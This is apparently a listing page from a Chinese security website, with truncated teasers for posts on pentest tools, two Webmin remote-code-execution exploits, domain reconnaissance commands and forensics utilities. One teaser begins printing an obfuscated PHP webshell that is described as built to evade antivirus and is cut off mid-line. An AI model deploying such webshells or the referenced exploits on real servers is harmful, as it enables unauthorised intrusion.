网络安全

TgWechat 微信聊天安全加密插件 仅供个人消遣玩耍，请勿用于非法或者商业用途。若用于非法用途，一切后果由使用者承担，与软件作者无关 一款采用Telegram类似的安全加密方案实现的保护个人隐私安全的微信...

sqlmap4burp++介绍 sqlmap4burp++是一款兼容Windows，mac，linux多个系统平台的Burpsuite与sqlmap联动插件。 在sqlmap4burp基础上进行了如下改动： 在支持Windows基础上，拓展对Linux，macOS的支持...

venom 33的更新，webshell免杀PHP一句话，体积更小了。 <?php class VMTX{ function __destruct(){ $BRLI='f$vjcT'^"\x7\x57\x5\xf\x11\x20"; return @$BRLI("$this->EKD...

Ehtools介绍 Ehtools是一个非常强大的WIFI渗透工具框架，对于初学者来说越来越容易使用，它可以很容易地从内部进行探索。 这个强大而简单的工具可以用于任何事情，从安装新的附加组件到在几秒钟内抓取一个 WP...

EDB-ID: 47230 CVE-2019-15107 本日由 Vendor 在@defcon AppSec Village 发布，修复了这个漏洞。 Webmin 必须更新到1.930版本。Exploit-DB LinkCVE-Mitre LinkDownload defcon_webmin_unauth_rce.rb (Meta...

EDB-ID: 46984 CVE-2019-12840 在 Webmin<= 1.910中，任何被授权到“ Package Updates”模块的用户都可以通过 data 参数 update.cgi 使用 root 权限执行任意命令。这造成了RCE漏洞。 Exploit-DB LinkC...

一个国内外常见CDN前端域名列表收集项目，可用于渗透测试/信息收集环节等场景，仅供参考。 包含CDN列表 Akamai.txtAliyun-SSL.txtAliyun.txtAzure.txtBeluga.txtCDN77.txtChinaCache.txtCloudFront-SSL-PA...

本文介绍了域渗透中域内信息收集的常见命令与基础工具。 常用收集域信息命令 Net use Net view Tasklist /v Ipconfig /all net group /domain 获得所有域用户组列表 net gr...

loginlog_windows 一个独立的小工具。EventLog 读取登录过本机的登录失败或登录成功的所有计算机信息，包括用户名、远程IP地址、时间。可用于网络取证和本地取证工具，内网渗透中快速定位运维管理人员等。 ...

AttackSurfaceMapper 渗透测试工具介绍 AttackSurfaceMapper（ASM）旨在通过将单个目标域或IPv4地址列表作为输入，然后使用被动OSINT技术和主动侦察方法对其进行分析，从而大大简化侦察过程。它是一个全新开...